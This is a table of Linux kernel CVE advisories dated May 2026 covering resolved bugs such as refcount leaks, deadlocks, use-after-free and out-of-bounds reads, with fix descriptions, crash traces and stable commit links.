| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: fix usb_dev refcount leak on probe failure create_card() takes a reference on the USB device with usb_get_dev() and stores the matching usb_put_dev() in card_free(), which is installed as the snd_card's ->private_free destructor. However, ->private_free is only assigned near the end of init_card(), after several failure points (usb_set_interface(), EP type checks, usb_submit_urb(), the EP1_CMD_GET_DEVICE_INFO exchange, and its timeout). When any of those fail, init_card() returns an error to snd_probe(), which calls snd_card_free(card). Because ->private_free is still NULL, card_free() never runs, the usb_get_dev() reference is not dropped, and the struct usb_device leaks along with its descriptor allocations and device_private. syzbot reproduces this with a malformed UAC3 device whose only valid altsetting is 0; init_card()'s usb_set_interface(usb_dev, 0, 1) call fails with -EIO and triggers the leak. Move the ->private_free assignment into create_card(), immediately after usb_get_dev(), so that every error path reaching snd_card_free() balances the reference. card_free()'s callees (snd_usb_caiaq_input_free, free_urbs, kfree) already tolerate the partially-initialized state because the chip private area is zero-initialized by snd_card_new(). | 2026-05-27 | not yet calculated | CVE-2026-46048 | https://git.kernel.org/stable/c/50c6a1f05973f56d23280c9d7645a7a5734e0907 https://git.kernel.org/stable/c/da3b8fd6a202d94fef11a443abc9171c52426a1c https://git.kernel.org/stable/c/6153878c5255bb69b7d0868105ca078ef13cbcf8 https://git.kernel.org/stable/c/21ca595aafa40d3ac70eab1f4cb62cc00ca21657 https://git.kernel.org/stable/c/7a5f1cd22d47f8ca4b760b6334378ae42c1bd24b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: ctxfi: Add fallback to default RSR for S/PDIF spdif_passthru_playback_get_resources() uses atc->pll_rate as the RSR for the MSR calculation loop. However, pll_rate is only updated in atc_pll_init() and not in hw_pll_init(), so it remains 0 after the card init. When spdif_passthru_playback_setup() skips atc_pll_init() for 32000 Hz, (rsr * desc.msr) always becomes 0, causing the loop to spin indefinitely. Add fallback to use atc->rsr when atc->pll_rate is 0. This reflects the hardware state, since hw_card_init() already configures the PLL to the default RSR. | 2026-05-27 | not yet calculated | CVE-2026-46049 | https://git.kernel.org/stable/c/25ded535ee261161bcf19dafd525c542e606559d https://git.kernel.org/stable/c/30f9494c6f2b53a78822cfb653ffbb1d092d44c8 https://git.kernel.org/stable/c/09496158f6ebba8830593f8972035c02f97124c1 https://git.kernel.org/stable/c/95b1ee8442cabbde83b2848e7c6100df90f3a00d https://git.kernel.org/stable/c/7d61662197ecdc458e33e475b6ada7f6da61d364 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix deadlock with check operation and nowait requests When an array check is running it will raise the barrier at which point normal requests will become blocked and increment the nr_pending value to signal there is work pending inside of wait_barrier(). NOWAIT requests do not block and so will return immediately with an error, and additionally do not increment nr_pending in wait_barrier(). Upstream change commit 43806c3d5b9b ("raid10: cleanup memleak at raid10_make_request") added a call to raid_end_bio_io() to fix a memory leak when NOWAIT requests hit this condition. raid_end_bio_io() eventually calls allow_barrier() and it will unconditionally do an atomic_dec_and_test(&conf->nr_pending) even though the corresponding increment on nr_pending didn't happen in the NOWAIT case. This can be easily seen by starting a check operation while an application is doing nowait IO on the same array. This results in a deadlocked state due to nr_pending value underflowing and so the md resync thread gets stuck waiting for nr_pending to == 0. Output of r10conf state of the array when we hit this condition: crash> struct r10conf barrier = 1, nr_pending = { counter = -41 }, nr_waiting = 15, nr_queued = 0, Example of md_sync thread stuck waiting on raise_barrier() and other requests stuck in wait_barrier(): md1_resync [<0>] raise_barrier+0xce/0x1c0 [<0>] raid10_sync_request+0x1ca/0x1ed0 [<0>] md_do_sync+0x779/0x1110 [<0>] md_thread+0x90/0x160 [<0>] kthread+0xbe/0xf0 [<0>] ret_from_fork+0x34/0x50 [<0>] ret_from_fork_asm+0x1a/0x30 kworker/u1040:2+flush-253:4 [<0>] wait_barrier+0x1de/0x220 [<0>] regular_request_wait+0x30/0x180 [<0>] raid10_make_request+0x261/0x1000 [<0>] md_handle_request+0x13b/0x230 [<0>] __submit_bio+0x107/0x1f0 [<0>] submit_bio_noacct_nocheck+0x16f/0x390 [<0>] ext4_io_submit+0x24/0x40 [<0>] ext4_do_writepages+0x254/0xc80 [<0>] ext4_writepages+0x84/0x120 [<0>] do_writepages+0x7a/0x260 [<0>] __writeback_single_inode+0x3d/0x300 [<0>] writeback_sb_inodes+0x1dd/0x470 [<0>] __writeback_inodes_wb+0x4c/0xe0 [<0>] wb_writeback+0x18b/0x2d0 [<0>] wb_workfn+0x2a1/0x400 [<0>] process_one_work+0x149/0x330 [<0>] worker_thread+0x2d2/0x410 [<0>] kthread+0xbe/0xf0 [<0>] ret_from_fork+0x34/0x50 [<0>] ret_from_fork_asm+0x1a/0x30 | 2026-05-27 | not yet calculated | CVE-2026-46050 | https://git.kernel.org/stable/c/965d6162dd88cc7cc193cf7f5bfc132d8bbf0523 https://git.kernel.org/stable/c/42fe37c90184cd1568838b84b488934c3671c963 https://git.kernel.org/stable/c/cac2106bb9a2180b288079b49ed626414fb5bc45 https://git.kernel.org/stable/c/1cdff2937c618f81058422bbdc4974a3e7ec9379 https://git.kernel.org/stable/c/7d96f3120a7fb7210d21b520c5b6f495da6ba436 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix soft lockup in retry_aligned_read() When retry_aligned_read() encounters an overlapped stripe, it releases the stripe via raid5_release_stripe() which puts it on the lockless released_stripes llist. In the next raid5d loop iteration, release_stripe_list() drains the stripe onto handle_list (since STRIPE_HANDLE is set by the original IO), but retry_aligned_read() runs before handle_active_stripes() and removes the stripe from handle_list via find_get_stripe() -> list_del_init(). This prevents handle_stripe() from ever processing the stripe to resolve the overlap, causing an infinite loop and soft lockup. Fix this by using __release_stripe() with temp_inactive_list instead of raid5_release_stripe() in the failure path, so the stripe does not go through the released_stripes llist. This allows raid5d to break out of its loop, and the overlap will be resolved when the stripe is eventually processed by handle_stripe(). | 2026-05-27 | not yet calculated | CVE-2026-46051 | https://git.kernel.org/stable/c/09880592f5a9dc73377d6eb5ac123537b5f8df49 https://git.kernel.org/stable/c/80fc6ca2cbde018d52e13f305edcd643911bd94b https://git.kernel.org/stable/c/1985cb3247e87ff6b8ca4bc5f9626f4f51024507 https://git.kernel.org/stable/c/883cc33b7af1c448663287f069ef9dfea001e90f https://git.kernel.org/stable/c/7f9f7c697474268d9ef9479df3ddfe7cdcfbbffc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: landlock: Fix LOG_SUBDOMAINS_OFF inheritance across fork() hook_cred_transfer() only copies the Landlock security blob when the source credential has a domain. This is inconsistent with landlock_restrict_self() which can set LOG_SUBDOMAINS_OFF on a credential without creating a domain (via the ruleset_fd=-1 path): the field is committed but not preserved across fork() because the child's prepare_creds() calls hook_cred_transfer() which skips the copy when domain is NULL. This breaks the documented use case where a process mutes subdomain logs before forking sandboxed children: the children lose the muting and their domains produce unexpected audit records. Fix this by unconditionally copying the Landlock credential blob. | 2026-05-27 | not yet calculated | CVE-2026-46057 | https://git.kernel.org/stable/c/2fcde49092aac55d5beef43fdd3633217672f7d1 https://git.kernel.org/stable/c/1c513b8a00df13d231021e74ad92babb3fedf64a https://git.kernel.org/stable/c/874c8f83826c95c62c21d9edfe9ef43e5c346724 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Always use NextRIP as vmcb02's NextRIP after first L2 VMRUN For guests with NRIPS disabled, L1 does not provide NextRIP when running an L2 with an injected soft interrupt, instead it advances the current RIP before running it. KVM uses the current RIP as the NextRIP in vmcb02 to emulate a CPU without NRIPS. However, after L2 runs the first time, NextRIP will be updated by the CPU and/or KVM, and the current RIP is no longer the correct value to use in vmcb02. Hence, after save/restore, use the current RIP if and only if a nested run is pending, otherwise use NextRIP. Give soft_int_next_rip the same treatment, as it's the same logic, just for a narrower use case. [sean: give soft_int_next_rip the same treatment] | 2026-05-27 | not yet calculated | CVE-2026-46059 | https://git.kernel.org/stable/c/3428ed1529a1af4cce5aff6c5bd2fcc39ad726bb https://git.kernel.org/stable/c/69fe1411a5ce678b4da6489b5d2282b4e1d13acf https://git.kernel.org/stable/c/8d397582f6b5e9fbcf09781c7c934b4910e94a50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix IRQ cleanup on 6xxx probe failure When adf_dev_up() partially completes and then fails, the IRQ handlers registered during adf_isr_resource_alloc() are not detached before the MSI-X vectors are released. Since the device is enabled with pcim_enable_device(), calling pci_alloc_irq_vectors() internally registers pcim_msi_release() as a devres action. On probe failure, devres runs pcim_msi_release() which calls pci_free_irq_vectors(), tearing down the MSI-X vectors while IRQ handlers (for example 'qat0-bundle0') are still attached. This causes remove_proc_entry() warnings: [ 22.163964] remove_proc_entry: removing non-empty directory 'irq/143', leaking at least 'qat0-bundle0' Moving the devm_add_action_or_reset() before adf_dev_up() does not solve the problem since devres runs in LIFO order and pcim_msi_release(), registered later inside adf_dev_up(), would still fire before adf_device_down(). Fix by calling adf_dev_down() explicitly when adf_dev_up() fails, to properly free IRQ handlers before devres releases the MSI-X vectors. | 2026-05-27 | not yet calculated | CVE-2026-46060 | https://git.kernel.org/stable/c/27f561bf894e46bdc2d6209c50884adad79d8277 https://git.kernel.org/stable/c/7cd651f1357dcc477e6483c3a4706836b46bdc92 https://git.kernel.org/stable/c/95aed2af87ec43fa7624cc81dd13d37824ad4972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: fix deadlock in jbd2_journal_cancel_revoke() Commit f76d4c28a46a ("fs/jbd2: use sleeping version of __find_get_block()") changed jbd2_journal_cancel_revoke() to use __find_get_block_nonatomic() which holds the folio lock instead of i_private_lock. This breaks the lock ordering (folio -> buffer) and causes an ABBA deadlock when the filesystem blocksize < pagesize: T1 T2 ext4_mkdir() ext4_init_new_dir() ext4_append() ext4_getblk() lock_buffer() <- A sync_blockdev() blkdev_writepages() writeback_iter() writeback_get_folio() folio_lock() <- B ext4_journal_get_create_access() jbd2_journal_cancel_revoke() __find_get_block_nonatomic() folio_lock() <- B block_write_full_folio() lock_buffer() <- A This can occasionally cause generic/013 to hang. Fix by only calling __find_get_block_nonatomic() when the passed buffer_head doesn't belong to the bdev, which is the only case that we need to look up its bdev alias. Otherwise, the lookup is redundant since the found buffer_head is equal to the one we passed in. | 2026-05-27 | not yet calculated | CVE-2026-46061 | https://git.kernel.org/stable/c/dff07cc98fdf6af57a7c054dc09b2050a9d5c287 https://git.kernel.org/stable/c/2b2fee890250ab647a601124471a334bb01a0790 https://git.kernel.org/stable/c/bbd943d6a2d566428324b516a37f98328dfb802d https://git.kernel.org/stable/c/981fcc5674e67158d24d23e841523eccba19d0e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/shstk: Prevent deadlock during shstk sigreturn During sigreturn the shadow stack signal frame is popped. The kernel does this by reading the shadow stack using normal read accesses. When it can't assume the memory is shadow stack, it takes extra steps to makes sure it is reading actual shadow stack memory and not other normal readable memory. It does this by holding the mmap read lock while doing the access and checking the flags of the VMA. Unfortunately that is not safe. If the read of the shadow stack sigframe hits a page fault, the fault handler will try to recursively grab another mmap read lock. This normally works ok, but if a writer on another CPU is also waiting, the second read lock could fail and cause a deadlock. Fix this by not holding mmap lock during the read access to userspace. Instead use mmap_lock_speculate_...() to watch for changes between dropping mmap lock and the userspace access. Retry if anything grabbed an mmap write lock in between and could have changed the VMA. These mmap_lock_speculate_...() helpers use mm::mm_lock_seq, which is only available when PER_VMA_LOCK is configured. So make X86_USER_SHADOW_STACK depend on it. On x86, PER_VMA_LOCK is a default configuration for SMP kernels. So drop support for the other configs under the assumption that the !SMP shadow stack user base does not exist. Currently there is a check that skips the lookup work when the SSP can be assumed to be on a shadow stack. While reorganizing the function, remove the optimization to make the tricky code flows more common, such that issues like this cannot escape detection for so long. | 2026-05-27 | not yet calculated | CVE-2026-46063 | https://git.kernel.org/stable/c/e2c2b044458cbf22da05264fa707308e8d4f86f9 https://git.kernel.org/stable/c/d042d69b417515959e49021fef008c9b04a99bd5 https://git.kernel.org/stable/c/4f3374c990fb2adec06d20fd6d780927811c9aa0 https://git.kernel.org/stable/c/3d29db827502067626062f5c74dd502d14ab15bc https://git.kernel.org/stable/c/9874b2917b9fbc30956fee209d3c4aa47201c64e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmasm: fix heap over-read in ibmasm_send_i2o_message() The ibmasm_send_i2o_message() function uses get_dot_command_size() to compute the byte count for memcpy_toio(), but this value is derived from user-controlled fields in the dot_command_header (command_size: u8, data_size: u16) and is never validated against the actual allocation size. A root user can write a small buffer with inflated header fields, causing memcpy_toio() to read up to ~65 KB past the end of the allocation into adjacent kernel heap, which is then forwarded to the service processor over MMIO. Silently clamping the copy size is not sufficient: if the header fields claim a larger size than the buffer, the SP receives a dot command whose own header is inconsistent with the I2O message length, which can cause the SP to desynchronize. Reject such commands outright by returning failure. Validate command_size before calling get_mfa_inbound() to avoid leaking an I2O message frame: reading INBOUND_QUEUE_PORT dequeues a hardware frame from the controller's free pool, and returning without a corresponding set_mfa_inbound() call would permanently exhaust it. Additionally, clamp command_size to I2O_COMMAND_SIZE before the memcpy_toio() so the MMIO write stays within the I2O message frame, consistent with the clamping already performed by outgoing_message_size() for the header field. | 2026-05-27 | not yet calculated | CVE-2026-46064 | https://git.kernel.org/stable/c/fd19eb1c75047a4ed4e855f56cafd704dc3914e0 https://git.kernel.org/stable/c/fe31722b0194ff76bf8b461e8bf97a2081147787 https://git.kernel.org/stable/c/c1c2417c60dbdca5ebb00462f21ee71c2d7f7083 https://git.kernel.org/stable/c/9e8f6c9d4ecddda2f28baa1678340286cff3969c https://git.kernel.org/stable/c/9aad71144fa3682cca3837a06c8623016790e7ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix num_ops off-by-one when crypto allocation fails move_dirty_folio_in_page_array() may fail if the file is encrypted, the dirty folio is not the first in the batch, and it fails to allocate a bounce buffer to hold the ciphertext. When that happens, ceph_process_folio_batch() simply redirties the folio and flushes the current batch -- it can retry that folio in a future batch. However, if this failed folio is not contiguous with the last folio that did make it into the batch, then ceph_process_folio_batch() has already incremented `ceph_wbc->num_ops`; because it doesn't follow through and add the discontiguous folio to the array, ceph_submit_write() -- which expects that `ceph_wbc->num_ops` accurately reflects the number of contiguous ranges (and therefore the required number of "write extent" ops) in the writeback -- will panic the kernel: BUG_ON(ceph_wbc->op_idx + 1 != req->r_num_ops); This issue can be reproduced on affected kernels by writing to fscrypt-enabled CephFS file(s) with a 4KiB-written/4KiB-skipped/repeat pattern (total filesize should not matter) and gradually increasing the system's memory pressure until a bounce buffer allocation fails. Fix this crash by decrementing `ceph_wbc->num_ops` back to the correct value when move_dirty_folio_in_page_array() fails, but the folio already started counting a new (i.e. still-empty) extent. The defect corrected by this patch has existed since 2022 (see first `Fixes:`), but another bug blocked multi-folio encrypted writeback until recently (see second `Fixes:`). The second commit made it into 6.18.16, 6.19.6, and 7.0-rc1, unmasking the panic in those versions. This patch therefore fixes a regression (panic) introduced by cac190c7674f. | 2026-05-27 | not yet calculated | CVE-2026-46066 | https://git.kernel.org/stable/c/6200f41d6fcf2ac7e24866431e381cbc914560e4 https://git.kernel.org/stable/c/ba12c1e578890f6337a415b7dedf476c6d455105 https://git.kernel.org/stable/c/a0d9555bf9eaeba34fe6b6bb86f442fe08ba3842 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: validate damos_quota_goal->nid for node_memcg_{used,free}_bp Users can set damos_quota_goal->nid with arbitrary value for node_memcg_{used,free}_bp. But DAMON core is using those for NODE-DATA() without a validation of the value. This can result in out of bounds memory access. The issue can actually triggered using DAMON user-space tool (damo), like below. $ sudo mkdir /sys/fs/cgroup/foo $ sudo ./damo start --damos_action stat --damos_quota_interval 1s \ --damos_quota_goal node_memcg_used_bp 50% -1 /foo $ sudo dmseg [...] [ 524.181426] Unable to handle kernel paging request at virtual address 0000000000002c00 Fix this issue by adding the validation of the given node id. If an invalid node id is given, it returns 0% for used memory ratio, and 100% for free memory ratio. | 2026-05-27 | not yet calculated | CVE-2026-46067 | https://git.kernel.org/stable/c/da10db73ada26345244ea5dc52f974692bd05f66 https://git.kernel.org/stable/c/a34dac6482e53e2c76944f25b1489b9b7da3a6e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: nx - fix bounce buffer leaks in nx842_crypto_{alloc,free}_ctx The bounce buffers are allocated with __get_free_pages() using BOUNCE_BUFFER_ORDER (order 2 = 4 pages), but both the allocation error path and nx842_crypto_free_ctx() release the buffers with free_page(). Use free_pages() with the matching order instead. | 2026-05-27 | not yet calculated | CVE-2026-46068 | https://git.kernel.org/stable/c/f17a4850d1ce7c11cba8b1830b9bfedfede878bb https://git.kernel.org/stable/c/910bb34b801d39794e656f7d48414844b2bd354e https://git.kernel.org/stable/c/5c07962fed66e1238fad7635fa150570bd38b4c5 https://git.kernel.org/stable/c/80fd99d7c30ea889662d21f1b44d8fea4c83138d https://git.kernel.org/stable/c/adb3faf2db1a66d0f015b44ac909a32dfc7f2f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mwifiex: fix use-after-free in mwifiex_adapter_cleanup() The mwifiex_adapter_cleanup() function uses timer_delete() (non-synchronous) for the wakeup_timer before the adapter structure is freed. This is incorrect because timer_delete() does not wait for any running timer callback to complete. If the wakeup_timer callback (wakeup_timer_fn) is executing when mwifiex_adapter_cleanup() is called, the callback will continue to access adapter fields (adapter->hw_status, adapter->if_ops.card_reset, etc.) which may be freed by mwifiex_free_adapter() called later in the mwifiex_remove_card() path. Use timer_delete_sync() instead to ensure any running timer callback has completed before returning. | 2026-05-27 | not yet calculated | CVE-2026-46069 | https://git.kernel.org/stable/c/11869ce402d95519d49b25a2a97741f68d69d103 https://git.kernel.org/stable/c/63fe3389b3e092d6c0eeea9fc0318e7918b16618 https://git.kernel.org/stable/c/4e179a60a60c0a5aea245e8e67768343c0f070b8 https://git.kernel.org/stable/c/030abbae49cf9fd1fba7aa08e15ec81efbeb78cf https://git.kernel.org/stable/c/ae5e95d4157481693be2317e3ffcd84e36010cbb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Avoid clearing VMCB_LBR in vmcb12 svm_copy_lbrs() always marks VMCB_LBR dirty in the destination VMCB. However, nested_svm_vmexit() uses it to copy LBRs to vmcb12, and clearing clean bits in vmcb12 is not architecturally defined. Move vmcb_mark_dirty() to callers and drop it for vmcb12. This also facilitates incoming refactoring that does not pass the entire VMCB to svm_copy_lbrs(). | 2026-05-27 | not yet calculated | CVE-2026-46071 | https://git.kernel.org/stable/c/a3f0981a5a0e0bd51ad74cc7d9eed32294b24002 https://git.kernel.org/stable/c/9efe23568806d1cd06f7d146f9b3037b8d585a9f https://git.kernel.org/stable/c/b53ab5167a81537777ac780bbd93d32613aa3bda |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: add buffer boundary checks to run_unpack() run_unpack() checks `run_buf < run_last` at the top of the while loop but then reads size_size and offset_size bytes via run_unpack_s64() without verifying they fit within the remaining buffer. A crafted NTFS image with truncated run data in an MFT attribute triggers an OOB heap read of up to 15 bytes when the filesystem is mounted. Add boundary checks before each run_unpack_s64() call to ensure the declared field size does not exceed the remaining buffer. Found by fuzzing with a source-patched harness (LibAFL + QEMU). | 2026-05-27 | not yet calculated | CVE-2026-46072 | https://git.kernel.org/stable/c/bf7ac4a1d3bfc6e56e54635c3d331a68170d37c9 https://git.kernel.org/stable/c/e64f7dfcaff79e7dfff9121a382dd77f9b462f62 https://git.kernel.org/stable/c/d3012690a7065d9ca86521a525ad11e8af491d45 https://git.kernel.org/stable/c/41aadf5cb482793a24e05aa136224e179a778586 https://git.kernel.org/stable/c/b62567bca47408e6739dee75f02a2113548af875 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (powerz) Fix missing usb_kill_urb() on signal interrupt wait_for_completion_interruptible_timeout() returns -ERESTARTSYS when interrupted. This needs to abort the URB and return an error. No data has been received from the device so any reads from the transfer buffer are invalid. The original code tests !ret, which only catches the timeout case (0). On signal delivery (-ERESTARTSYS), !ret is false so the function skips usb_kill_urb() and falls through to read from the unfilled transfer buffer. Fix by capturing the return value into a long (matching the function return type) and handling signal (negative) and timeout (zero) cases with separate checks that both call usb_kill_urb() before returning. | 2026-05-27 | not yet calculated | CVE-2026-46073 | https://git.kernel.org/stable/c/8b51277eec433d4e724b273a5a5c64e8acfbe405 https://git.kernel.org/stable/c/b6cb07f02253bdefd2339e57eaa1428a7b28cd0f https://git.kernel.org/stable/c/d64458784036f5818e22781254b6be299d52a19c https://git.kernel.org/stable/c/b66437cb20a2d9ef201f40b675569f8ea7787c9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix memory leaks on probe failures Make sure to deregister the controller, disable pins, and kill and free the RX URB on probe failures to mirror disconnect and avoid memory leaks and use-after-free. Also add an explicit URB kill on disconnect for symmetry (even if that is not strictly required as USB core would have stopped it in the current setup). | 2026-05-27 | not yet calculated | CVE-2026-46074 | https://git.kernel.org/stable/c/5c6518633702d7f7b1153e9d8e042af847f11ef3 https://git.kernel.org/stable/c/ff8a7996dc8bf433efe2126ffdaee5b374a89e30 https://git.kernel.org/stable/c/9bee2faf9e21c796d0d222c9d84a98f41bd303a0 https://git.kernel.org/stable/c/b99e3ddb91b499d920e63a2daff8880be68cfe9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-sha204a - Fix potential UAF and memory leak in remove path Unregister the hwrng to prevent new ->read() calls and flush the Atmel I2C workqueue before teardown to prevent a potential UAF if a queued callback runs while the device is being removed. Drop the early return to ensure sysfs entries are removed and ->hwrng.priv is freed, preventing a memory leak. | 2026-05-27 | not yet calculated | CVE-2026-46075 | https://git.kernel.org/stable/c/c5a45d14234bf26e28a89e3a5dcc08336595cf11 https://git.kernel.org/stable/c/775c00d87c385b758da9504cf053acea00e2ed40 https://git.kernel.org/stable/c/1193c12126d39bf986a5a9214827b73707b193ab https://git.kernel.org/stable/c/31901371ccd16b42d2f167b1018ba9ae8bd5a6c7 https://git.kernel.org/stable/c/bab1adf3b87e4bfac92c4f5963c63db434d561c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-tdes - fix DMA sync direction Before DMA output is consumed by the CPU, ->dma_addr_out must be synced with dma_sync_single_for_cpu() instead of dma_sync_single_for_device(). Using the wrong direction can return stale cache data on non-coherent platforms. | 2026-05-27 | not yet calculated | CVE-2026-46077 | https://git.kernel.org/stable/c/5281e6e2302362f6b75b70cbfe4098d2a25dafd9 https://git.kernel.org/stable/c/12a0adfe498cd5d87e6365d7ca5f6b3eed79e523 https://git.kernel.org/stable/c/863d11b3927703ad95077c81a8a6489c5c7872f7 https://git.kernel.org/stable/c/b5f5df801d161ba244f391519cbff2f4e5c6edc2 https://git.kernel.org/stable/c/c8a9a647532f5c2a04180352693215e24e9dba03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rbd: fix null-ptr-deref when device_add_disk() fails do_rbd_add() publishes the device with device_add() before calling device_add_disk(). If device_add_disk() fails after device_add() succeeds, the error path calls rbd_free_disk() directly and then later falls through to rbd_dev_device_release(), which calls rbd_free_disk() again. This double teardown can leave blk-mq cleanup operating on invalid state and trigger a null-ptr-deref in __blk_mq_free_map_and_rqs(), reached from blk_mq_free_tag_set(). Fix this by following the normal remove ordering: call device_del() before rbd_dev_device_release() when device_add_disk() fails after device_add(). That keeps the teardown sequence consistent and avoids re-entering disk cleanup through the wrong path. The bug was first flagged by an experimental analysis tool we are developing for kernel memory-management bugs while analyzing v6.13-rc1. The tool is still under development and is not yet publicly available. We reproduced the bug on v7.0 with a real Ceph backend and a QEMU x86_64 guest booted with KASAN and CONFIG_FAILSLAB enabled. The reproducer confines failslab injections to the __add_disk() range and injects fail-nth while mapping an RBD image through /sys/bus/rbd/add_single_major. On the unpatched kernel, fail-nth=4 reliably triggered the fault: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 UID: 0 PID: 273 Comm: bash Not tainted 7.0.0-01247-gd60bc1401583 #6 PREEMPT(lazy) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 RIP: 0010:__blk_mq_free_map_and_rqs+0x8c/0x240 Code: 00 00 48 8b 6b 60 41 89 f4 49 c1 e4 03 4c 01 e5 45 85 ed 0f 85 0a 01 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 e9 48 c1 e9 03 <80> 3c 01 00 0f 85 31 01 00 00 4c 8b 6d 00 4d 85 ed 0f 84 e2 00 00 RSP: 0018:ff1100000ab0fac8 EFLAGS: 00000246 RAX: dffffc0000000000 RBX: ff1100000c4806a0 RCX: 0000000000000000 RDX: 0000000000000002 RSI: 0000000000000000 RDI: ff1100000c4806f4 RBP: 0000000000000000 R08: 0000000000000001 R09: ffe21c000189001b R10: ff1100000c4800df R11: ff1100006cf37be0 R12: 0000000000000000 R13: 0000000000000000 R14: ff1100000c480700 R15: ff1100000c480004 FS: 00007f0fbe8fe740(0000) GS:ff110000e5851000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe53473b2e0 CR3: 0000000012eef000 CR4: 00000000007516f0 PKRU: 55555554 Call Trace: <TASK> blk_mq_free_tag_set+0x77/0x460 do_rbd_add+0x1446/0x2b80 ? __pfx_do_rbd_add+0x10/0x10 ? lock_acquire+0x18c/0x300 ? find_held_lock+0x2b/0x80 ? sysfs_file_kobj+0xb6/0x1b0 ? __pfx_sysfs_kf_write+0x10/0x10 kernfs_fop_write_iter+0x2f4/0x4a0 vfs_write+0x98e/0x1000 ? expand_files+0x51f/0x850 ? __pfx_vfs_write+0x10/0x10 ksys_write+0xf2/0x1d0 ? __pfx_ksys_write+0x10/0x10 do_syscall_64+0x115/0x690 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f0fbea15907 Code: 10 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b7 0f 1f 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 51 c3 48 83 ec 28 48 89 54 24 18 48 89 74 24 RSP: 002b:00007ffe22346ea8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000000058 RCX: 00007f0fbea15907 RDX: 0000000000000058 RSI: 0000563ace6c0ef0 RDI: 0000000000000001 RBP: 0000563ace6c0ef0 R08: 0000563ace6c0ef0 R09: 6b6435726d694141 R10: 5250337279762f78 R11: 0000000000000246 R12: 0000000000000058 R13: 00007f0fbeb1c780 R14: ff1100000c480700 R15: ff1100000c480004 </TASK> With this fix applied, rerunning the reproducer over fail-nth=1..256 yields no KASAN reports. [ idryomov: rename err_out_device_del -> err_out_device ] | 2026-05-27 | not yet calculated | CVE-2026-46079 | https://git.kernel.org/stable/c/2f4809a879f0750c7790bbeeae86c9505797a06f https://git.kernel.org/stable/c/564cd8f4aeb9a938e470c5c91922fd02e4d41acc https://git.kernel.org/stable/c/ad0126ffcba8777109852979eaaa6dca6703abdb https://git.kernel.org/stable/c/059fb7656723c1b77c2fc0e64b7aa99d6bb65e8e https://git.kernel.org/stable/c/d1fef92e414433ca7b89abf85cb0df42b8d475eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: split transactions in dio completion to avoid credit exhaustion During ocfs2 dio operations, JBD2 may report warnings via following call trace: ocfs2_dio_end_io_write ocfs2_mark_extent_written ocfs2_change_extent_flag ocfs2_split_extent ocfs2_try_to_merge_extent ocfs2_extend_rotate_transaction ocfs2_extend_trans jbd2__journal_restart start_this_handle output: JBD2: kworker/6:2 wants too many credits credits:5450 rsv_credits:0 max:5449 To prevent exceeding the credits limit, modify ocfs2_dio_end_io_write() to handle extents in a batch of transaction. Additionally, relocate ocfs2_del_inode_from_orphan(). The orphan inode should only be removed from the orphan list after the extent tree update is complete. This ensures that if a crash occurs in the middle of extent tree updates, we won't leave stale blocks beyond EOF. This patch also changes the logic for updating the inode size and removing orphan, making it similar to ext4_dio_write_end_io(). Both operations are performed only when everything looks good. Finally, thanks to Jans and Joseph for providing the bug fix prototype and suggestions. | 2026-05-27 | not yet calculated | CVE-2026-46080 | https://git.kernel.org/stable/c/886f97fa59d0bbfa9859fb1a66dd9e014b522d89 https://git.kernel.org/stable/c/ea5bb1d20da756e4f41a48dad42b2e7d6e73f71e https://git.kernel.org/stable/c/3c636a3edca9c3f180b3079f94fe7e115730d9c6 https://git.kernel.org/stable/c/069c3fb310e9336cf48cfdf8748a32c29fd0193d https://git.kernel.org/stable/c/d647c5b2fbf81560818dacade360abc8c00a9665 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Inject #UD for INVLPGA if EFER.SVME=0 INVLPGA should cause a #UD when EFER.SVME is not set. Add a check to properly inject #UD when EFER.SVME=0. [sean: tag for stable@] | 2026-05-27 | not yet calculated | CVE-2026-46082 | https://git.kernel.org/stable/c/3ac9d4241d205f5d0df06358349ca718ebb0fa12 https://git.kernel.org/stable/c/643125b66ffc1147c66616b749475ba9efb15971 https://git.kernel.org/stable/c/c15392ed9e49c1a16b4d3a3ccf1b3bf2318a6c28 https://git.kernel.org/stable/c/ee24928ecd85db4b68ed111e91fef36af0ca37b0 https://git.kernel.org/stable/c/d99df02ff427f461102230f9c5b90a6c64ee8e23 |
